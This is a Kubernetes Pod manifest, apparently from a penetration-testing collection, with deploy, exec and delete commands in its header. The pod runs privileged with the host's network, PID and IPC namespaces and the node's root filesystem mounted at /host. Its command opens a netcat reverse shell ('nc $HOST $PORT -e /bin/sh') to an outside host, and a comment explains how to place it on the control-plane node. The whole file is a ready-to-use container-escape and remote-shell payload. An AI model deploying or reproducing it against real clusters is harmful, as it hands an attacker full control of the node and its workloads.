###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-everything-allowed-revshell.yaml 
## Access: kubectl -n [namespace] exec -it pod-everything-allowed-revshell -- bash
## Remove: kubectl -n [namespace] delete pod-everything-allowed-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-everything-allowed-revshell
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-revshell
    image: busybox
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    #nodeName: control-plane-node-name # Uncomment and change to control node name to try and schedule pod on control-plane node
  volumes:
  - name: noderoot
    hostPath:
      path: /